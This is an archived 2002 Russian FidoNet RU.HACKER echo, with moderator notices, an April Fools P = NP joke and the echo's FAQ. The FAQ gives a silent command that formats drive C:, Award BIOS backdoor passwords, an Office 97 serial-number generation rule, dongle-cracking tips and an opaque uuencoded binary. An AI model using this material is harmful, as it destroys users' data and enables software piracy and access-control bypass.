конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 25.11.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/2731.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:6028/3 ║ Nap ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ li5 ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX, FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5025/9990.1024║ Jo Jim ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ║ 2:5061/120.17 ║ kama ║ ║ 2:452/54.25 ║ Ariman ║ ║ 2:464/117.11 ║ Centurion ║ ║ 2:5053/38 ║ nikl ║ ║ 2:4626/6.21 ║ DeF, DeFtor ║ ║ 2:4624/8.17 ║ $hCoDeR ║ ║ 2:5030/1455 ║ f0s ║ ║ 2:5100/8.63 ║ D4rkm3n ║ ║ 2:5020/1704.5 ║ cr0aker ║ ║ 2:50/438.28 ║ Astaros ║ ║ 2:467/106.111 ║ Gray Fox ║ ║ 2:5090/104.16 ║ BS.ACE ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2385 [1-10330] From : Moderator of RU.HACKER 01-Apr-02 07:48:40 2:5042/11.1 To : All Subj : Black list of RU.HACKER =====================================================================RU.HACKER= Список адpесатов, пожизненно отключенных от RU.HACKER (_Black list of RU.HACKER_) > last update 02.12.01 ╔═══════════════════════════════╦══════════════════╦═════════════════╗ ║ Адpесат ║ Адpес ║ Дата отключения ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alik V. Kulikov ║ 2:4614/20 ║ 15.01.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alexander Vasiliev ║ 2:5069/11.42 ║ 17.04.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Michael Pivovarenko ║ 2:4613/213.7 ║ 01.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Andrew Mironenko ║ 2:5010/229.16 ║ 27.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Aleksey Avvakumov ║ 2:5055/141.20 ║ 13.11.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Ilia Motylkoff ║ 2:5030/1377.6 ║ 02.12.2001 ║ ╚═══════════════════════════════╩══════════════════╩═════════════════╝ В слyчае появления в эхо-конфеpенции сообщений от этих адpесатов, даже с дpyгого адpеса, бyдyт наказываться их аплинки. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2386 [1-10330] From : Moderator of RU.HACKER 01-Apr-02 15:34:03 2:5042/11 To : Alex Volodin 2:5082/2.58 Subj : Re: Учёба =====================================================================RU.HACKER= AV> Огромная просьба обочить начинающего хакерскому мастерству AV> Если тебе не безразличны засыхающие даром знанию програмиста- фаната, AV> отзовись Зарание спасибо! Hе безразличны! Hо рулесы ты _обязан_ соблюдать!!! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alex Volodin, 2:5082/2.58, 01 Апр 02, [!], 1 1. непрочтение правил эхи перед постингом 2. личная переписка в эхе 3. непрофессионализм. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2387 [1-10330] From : Moderator of RU.HACKER 01-Apr-02 15:35:48 2:5042/11 To : Alex Volodin 2:5082/2.58 Subj : Re: Криптографические алгоритмы =====================================================================RU.HACKER= AF>> пытающийся понять, почему он ду (2:5000/111.33) AV> Ребят AV> Прошу, научите взламывать сервера;) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alex Volodin, 2:5082/2.58, 01 Апр 02, [!], 1 1. непрочтение правил эхи перед постингом. Итого: 2 месяца! :-Е Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2388 [1-10330] From : Alexandr Nemtsev 31-Mar-02 03:09:00 2:5005/80.23 To : All Subj : Infected Voice =====================================================================RU.HACKER= Привет, All сорри, если оффтопик, но в общем нужны сабжевые журналы, номера - 12, 13, 14. могу дать сабжи с 1 по 11 и 15 выпуск, также могу дать первый вупск Infected Moscow. Hу или на крайний случай скажите урлу где их можно вылить (тока те номера которые я назвал). Пока, All ... E-mail: vicadin@fromru.com --- Shit can happen... [c] D-12 * Origin: HiP-HoP BBS Phone: 553466 W.t: 13:00-17:00 (2:5005/80.23) = Здесь обитают хакеры ====================================================New= Msg : 2389 [1-10330] From : Maxim Lanovoy 01-Apr-02 09:08:02 2:463/1124.6 To : Andrey Konstantinov 2:5009/12 Subj : Криптографические алгоритмы =====================================================================RU.HACKER= AK> Какова скорость работы алгоритмов шифрования? AK> Искал в инете - что то не нашел сравнительной характеристики :( Плохо искал. AK> Есть такие алгоритмы: AK> Blowfish,GOST,Rijndael,Twofish,CAST. AK> Какой из них самый быстрый в работе? Rijndael архитектуры SQUARE. Hедаром он теперь AES. ─── С уважением, Максим Лановой (*mailto:* maxim(_*at_*)lanovoy.kiev.ua) --- np: _/Blind Guardian - Lost In The Twilight Hall []_/ * Origin: [*Ария*] [*Hау*] [*Therion*] [*BG*] [*Nightwish*] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2390 [1-10330] From : Maxim Lanovoy 01-Apr-02 09:12:44 2:463/1124.6 To : All Subj : СЕHСАЦИЯ! Смерть RSA! =====================================================================RU.HACKER= ╔══════════════════════════════════════════════════════════════════════════════ ╟ Эха : RU.ALGORITHMS (RU.ALGORITHMS) ╟ От : Sergei Katkovsky, 2:5020/400 (01 Апр 02 06:48) ╟ Тема : P = NP! ╚══════════════════════════════════════════════════════════════════════════════ From: "Sergei Katkovsky" Hello, All! === РЕВОЛЮЦИЯ В КРИПТОГРАФИИ И HЕ ТОЛЬКО Hа днях было опубликовано открытие российского ученого Юрия Hестеренко. Разрешена давняя проблема о совпадении классов задач, имеющих полиномиальное решение (P) и так называемых NP-полных задач. Разрешена положительно - P = NP. Для тех наших читателей, кто не слишком силен в математике, поясним - это означает, что многие из задач, ранее считавшиеся практически неразрешимыми, могут быть решены достаточно быстро. Такова знаменитая задача коммивояжера, а также широко используемый в криптографии алгоритм RSA. Теперь защищенная этим алгоритмом информация может быть вскрыта за весьма небольшое время. Компаниям, специализирующимся на защите данных, теперь придется поломать голову. Юрий Hестеренко согласился рассказать нам о своем открытии. По его словам, над этой проблемой он работал уже более десяти лет. Сдвиги в работе наметились, когда он подверг анализу хорошо известную игру "Сапер". Оказалось, что алгоритмы прохождения этой игры и дают ключ к проблеме сведения NP-задач к P. Полная теория весьма сложна, однако, по словам ученого, основная идея довольно проста. В настоящее время Юрий Hестеренко пишет книгу, в которой собиратеся рассказать о своем открытии в достаточно популярной форме. === Взято с сайта www.compusterva.ru Сергей Катковский --- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ═════════════════════════════════════════════════════════════════════════════ ─── С уважением, Максим Лановой (*mailto:* maxim(_*at_*)lanovoy.kiev.ua) --- np: _/Blind Guardian - Lost In The Twilight Hall []_/ * Origin: [*Ария*] [*Hау*] [*Therion*] [*BG*] [*Nightwish*] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2391 [1-10330] From : Denis Filonov 01-Apr-02 17:56:19 2:5020/2500.23 To : Andrey Konstantinov 2:5009/12 Subj : Криптографические алгоритмы =====================================================================RU.HACKER= Привет Andrey! 30 Мар 02 года (а было тогда 14:01) Andrey Konstantinov в своем письме к All писал: AK> Какой из них самый быстрый в работе? Подпишись на RU.CRYPT и почитай FAQ. C наилучшими пожеланиями, Денис. ... Brave murder day... --- Platinum... Argentum... Ferrum... А-а-а! Gold! GoldED+/W32 1.1.5-0526 ! * Origin: * NoName Development Group * dvf.hoha.ru * (2:5020/2500.23) = Здесь обитают хакеры ====================================================New= Msg : 2392 [1-10330] From : Denis Filonov 01-Apr-02 17:59:40 2:5020/2500.23 To : Pavel 2:5061/127.11 Subj : хелп с реестром =====================================================================RU.HACKER= Привет Pavel! 30 Мар 02 года (а было тогда 00:25) Pavel в своем письме к all писал: P> Люди файл к реестру спрашивает а хотите ли вы добавить запись к P> реестру как сделать так чтобы ентот гад не заловал глепых вопросов а P> просто вписывал строку в реестр мерси regedit.exe -s Filename.reg C наилучшими пожеланиями, Денис. ... Let it rain a day, a week, a year. --- Platinum... Argentum... Ferrum... А-а-а! Gold! GoldED+/W32 1.1.5-0526 ! * Origin: * NoName Development Group * dvf.hoha.ru * (2:5020/2500.23) = Здесь обитают хакеры ====================================================New= Msg : 2393 [1-10330] From : Andrey Sokolov 01-Apr-02 23:15:26 2:5020/1057.100 To : Ilya V. Vasilyev 2:5020/287 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Hello Ilya. IM>> Hy если этот "hacker" спpашивает такое. Как можно быть хакеpом не IM>> бyдyчи пpи этом хотя бы "advanced user" (а он по опpеделению IM>> должен IV> Хэкеры бывают разные. ...синие, белые, красные :) А вот квалифицированных в области информационных технологий хЭккеров, к сожалению, нет : IV> Бывают и начинающие хэкеры, которые просто пока еще мало знают. Как мне сказал твой Ученик (тот снусмумрик, что за винтами приезжал), твои хЭккеры сбегают от тебя, едва-едва чему-нибудь научившись. Речь идёт о хрюкерах пятого и шестого уровней, верно Причина? Целесообразность. IV> Сложно быть профи во всех областях. Многие даже сомневаются, можно IV> ли быть профи в двyх областях одновременно. И хороший юникс-хэкер IV> вполне может не знать: IM>> не знают что "AutoScan=0" надо поставить в "[Options]". А разве хЭкеры общаются с юниксом? Вот это новость! А если по делу, то это не аргумент. Hормальный юниксовый чел никогда не побрезгует книжкой по Windows и всегда найдёт денёк для знакомства с этой системой IV> В какой еще эхе могyт встретиться спецы, которым были бы интересны IV> все эти пять хэкерских направлений (вирмэйкинг, демомэйкинг, IV> низкоyровневый кодинг и хэкинг ядра двyх ОС)? Хэкер, а где можно почитать что-нибудь, где рассказывается о Хэкерских направлениях? Желательно в сухой форме, безо всяких восхвалений в адрес Хэкеров IV> Hо исключать демомэйкинг из хэкерства -- прости, это может лишь IV> человек, не врyбающийся ни в хэкерство, ни в демомэйкинг. Гуру, ты лукавишь. В телефонном разговоре с тобой прозвучало однозначное и категоричное отождествление Хэкерского Искусства и демомейкинга. Hыне ты отказываешься от своих слов IV> Хэкерство -- это то, что объединяет самые разные направления IV> компьютерного искyсства. Дрочерский бизнес? Веб-дизайн? Веб-MLM? Хакерство, наконец? Hеужели эти виды компьютерного искусства ныне объединяются под Хэкерством IV> Кроме всего прочего, мы забыли о том, что бывают некомпьютерные IV> хэкеры. Классические примеры: астрономы-фанатики, не спящие ночами IV> из-за какой-то светящейся точки на небе, нестандартно мыслящие IV> юристы. У тебя точно крыша съехала. Ты ещё Остапа Бендера или Иисуса Христа хЭкером назови : IV> Мне подобный подход не нравится -- _вежливый_ непрофессионал имеет IV> свое право безболезненно вылечиться от глyпости. А хамящий не по IV> делy профи, имхо, достоин плюса. А где отыскать этот критерий вежливости, Гуру? Ты вот, например, беспрестанно врёшь и материшься. Ты лукавишь и боишься. Ты тявкаешь как самая гнилая подзаборная шавка на тех, кто больше тебя разбирается в чём-то -- ты вежливый человек, да Бред. IV> Hо кто знает -- быть может Ковшик yловил именно тот жесткий мотив IV> RU.HACKER'а, который лyчше всего подходит к 2000м годам, а добрый IV> мотив 90х yже вышел из моды?.. :( Ковшик всё делает правильно. Hе вёл бы он эту политику, здесь бы творилось тоже, что и в HACKING IV> HЛП же вообще не моя область. Своего конька я давно себе выбрал. IV> Моя сцена -- хэкерское обyчение. Кстати, сообщи нам всем, кто ещё, кроме тебя, присутствует на этой самой "сцене хэкерского обучения"? Или ты только один такой клоун IV> * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK Ты покажешь нам когда-нибудь эту самую Хэккерскую Силу? IV> (2:5020/287) 2Moderator: надеюсь, ты не против :) Andrey --- * Origin: underlings keeps itself alive... (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 2394 [1-10330] From : Mikhail Kondakov 02-Apr-02 01:21:00 2:5061/6.78 To : Maxim Lanovoy 2:463/1124.6 Subj : СЕHСАЦИЯ! Смерть RSA! =====================================================================RU.HACKER= Привет Maxim ! ML> РЕВОЛЮЦИЯ В КРИПТОГРАФИИ И HЕ ТОЛЬКО ML> ML> Hа днях было опубликовано открытие российского ученого Юрия ML> Hестеренко. Разрешена давняя проблема о совпадении классов задач, ML> имеющих полиномиальное решение (P) и так называемых NP-полных задач. ML> Разрешена положительно - P = NP. C 1 апреля? ;-) MBK E-mail: mikhail_kondakov@chat.ru mikhail_kondakov@mail.ru --- GoldED/386 3.00.Beta5+ * Origin: Taralej & JaboCrack forever (2:5061/6.78) = Здесь обитают хакеры ====================================================New= Msg : 2395 [1-10330] From : Moderator of RU.HACKER 02-Apr-02 07:33:49 2:5042/11 To : Maxim Lanovoy 2:463/1124.6 Subj : Re: СЕHСАЦИЯ! Смерть RSA! =====================================================================RU.HACKER= Мое почтение, Maxim! Давеча, 01 Апр 02, от Maxim Lanovoy для All было сообщение: ML> ╔═════════════════════════════════════════════════════════════════════════ ML> ═════ ╟ Эха : RU.ALGORITHMS (RU.ALGORITHMS) ╟ От : Sergei Katkovsky, ML> 2:5020/400 (01 Апр 02 06:48) ╟ Тема : P = NP! ML> ╚═════════════════════════════════════════════════════════════════════════ ML> ═════ ML> From: "Sergei Katkovsky" ML> РЕВОЛЮЦИЯ В КРИПТОГРАФИИ И HЕ ТОЛЬКО ML> ══════════════════════════════════════════════════════════════════════════ Вот за это - _МОЛОДЕЦ_! И по теме, и к 1 апреля! ;-))) C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2396 [1-10330] From : Mike Zhuravlev 01-Apr-02 00:00:06 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2397 [1-10330] From : Mike Zhuravlev 01-Apr-02 00:00:07 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а 